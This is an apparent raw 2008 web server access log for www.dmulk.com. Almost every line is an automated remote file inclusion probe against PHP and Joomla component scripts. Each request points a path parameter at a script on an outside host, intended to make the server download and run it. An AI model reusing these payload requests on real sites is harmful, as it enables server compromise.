202.228.192.194 - - [19/Aug/2008:09:00:00 -0700] "GET /logs/homepage.php?sel=http://biz4youhost.com//2.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.228.192.194 - - [19/Aug/2008:09:00:00 -0700] "GET /homepage.php?sel=http://biz4youhost.com//2.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.21.231 - - [19/Aug/2008:09:00:05 -0700] "GET //modules/xfsection/modify.php?dir_module=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:00:07 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:00:08 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
202.228.192.194 - - [19/Aug/2008:09:00:09 -0700] "GET /logs/homepage.php?sel=http://biz4youhost.com//2.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.228.192.194 - - [19/Aug/2008:09:00:09 -0700] "GET /homepage.php?sel=http://biz4youhost.com//2.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:00:10 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:00:11 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:00:11 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:00:11 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:00:12 -0700] "GET /logs/access_080524.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:00:12 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:00:15 -0700] "GET /logs/access_080525.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:00:30 -0700] "GET /logs/access_080730.log/phphtml.php?htmlclass_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:00:31 -0700] "GET /phphtml.php?htmlclass_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:00:31 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:00:37 -0700] "GET /logs/access_080615.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
88.158.0.5 - - [19/Aug/2008:09:00:37 -0700] "GET /logs/access_080725.log/?error=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [19/Aug/2008:09:00:37 -0700] "GET /logs/access_080725.log/?error=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:00:38 -0700] "GET /logs/access_080524.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:00:38 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:00:38 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
88.158.0.5 - - [19/Aug/2008:09:00:43 -0700] "GET /?error=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 200 9891 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [19/Aug/2008:09:00:44 -0700] "GET /?error=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 200 9891 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [19/Aug/2008:09:00:45 -0700] "GET /logs/?error=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 200 61284 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [19/Aug/2008:09:00:45 -0700] "GET /logs/?error=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 200 61284 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:00:48 -0700] "GET /logs/access_080728.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:00:48 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:00:49 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:00:53 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.64.112.75 - - [19/Aug/2008:09:01:13 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.64.112.75 - - [19/Aug/2008:09:01:13 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:01:14 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:01:17 -0700] "GET /phphtml.php?htmlclass_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.85.186 - - [19/Aug/2008:09:01:17 -0700] "GET /logs/access_080131.log//admin/spaw/spaw_control.class.php?spaw_root=http://verinet.com.tr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:01:21 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:01:21 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:01:21 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
66.249.67.201 - - [19/Aug/2008:09:01:22 -0700] "GET /blog/index.php/2008/06/05/ HTTP/1.1" 200 10850 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:01:22 -0700] "GET /logs/access_080730.log/phphtml.php?htmlclass_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:01:22 -0700] "GET /phphtml.php?htmlclass_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:01:23 -0700] "GET /logs/phphtml.php?htmlclass_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
88.158.0.5 - - [19/Aug/2008:09:01:23 -0700] "GET /logs/access_080724.log/?error=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [19/Aug/2008:09:01:23 -0700] "GET /logs/access_080724.log/?error=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:01:31 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:01:36 -0700] "GET /logs/access_080408.log/phphtml.php?htmlclass_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:02:05 -0700] "GET /logs/access_080805.log/phphtml.php?htmlclass_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:02:43 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:02:44 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:02:55 -0700] "GET /logs/access_080520.log//admin/business_inc/saveserver.php?thisdir=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:02:56 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:02:56 -0700] "GET /logs/access_080718.log//admin/business_inc/saveserver.php?thisdir=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:03:01 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:03:01 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:03:01 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:03:02 -0700] "GET /logs/access_080518.log/joomla/index.php?option=com_restaurante&task=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:03:02 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:03:03 -0700] "GET /logs/access_080516.log/joomla/index.php?option=com_restaurante&task=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.246.8.237 - - [19/Aug/2008:09:03:08 -0700] "GET /logs/access_080421.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:09:03:08 -0700] "GET /logs/access_080219.log//?path%5Bdocroot%5D=http://123fuck.t35.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.8.237 - - [19/Aug/2008:09:03:08 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.8.237 - - [19/Aug/2008:09:03:08 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:03:09 -0700] "GET /logs/access_080624.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:03:09 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:03:09 -0700] "GET /logs/access_080425.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:03:10 -0700] "GET /facileforms.frame.php?ff_compath=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:03:13 -0700] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:03:13 -0700] "GET /logs/access_080214.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:03:16 -0700] "GET /logs/access_080518.log/joomla/index.php?option=com_restaurante&task=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:03:16 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:03:16 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:03:17 -0700] "GET /logs/access_080516.log/joomla/index.php?option=com_restaurante&task=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:03:21 -0700] "GET /logs/access_080624.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:03:21 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:03:21 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:03:27 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:03:27 -0700] "GET /logs/access_080214.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:03:31 -0700] "GET /logs/access_080720.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:03:33 -0700] "GET /logs/access_080131.log/errors.php?error=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:03:33 -0700] "GET /errors.php?error=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:03:34 -0700] "GET /logs/errors.php?error=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.8.237 - - [19/Aug/2008:09:03:34 -0700] "GET /logs/access_080227.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:03:37 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:03:38 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:03:38 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:03:38 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:03:38 -0700] "GET /logs/access_080807.log//admin/business_inc/saveserver.php?thisdir=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:03:38 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:03:39 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:03:40 -0700] "GET /logs/access_080806.log//admin/business_inc/saveserver.php?thisdir=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:03:55 -0700] "GET /logs/access_080227.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:04:01 -0700] "GET /logs/access_080728.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:04:08 -0700] "GET /logs/access_080717.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:04:08 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:04:09 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 200 9964 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
69.73.189.205 - - [19/Aug/2008:09:04:17 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
69.73.189.205 - - [19/Aug/2008:09:04:17 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:04:26 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:04:26 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.111.176.106 - - [19/Aug/2008:09:04:27 -0700] "GET /logs/access_080630.log/phpSecurePages/secure.php?&cfgProgDir=http://www.gugn.ru/news/data/archives/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Aug/2008:09:04:27 -0700] "GET /phpSecurePages/secure.php?&cfgProgDir=http://www.gugn.ru/news/data/archives/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Aug/2008:09:04:28 -0700] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://www.gugn.ru/news/data/archives/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:04:29 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:04:29 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:04:31 -0700] "GET /logs/access_080615.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:04:34 -0700] "GET /logs/access_080730.log/phphtml.php?htmlclass_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:04:38 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:04:38 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:04:38 -0700] "GET /phphtml.php?htmlclass_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:04:38 -0700] "GET /logs/access_080408.log/phphtml.php?htmlclass_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
67.192.48.154 - - [19/Aug/2008:09:04:46 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
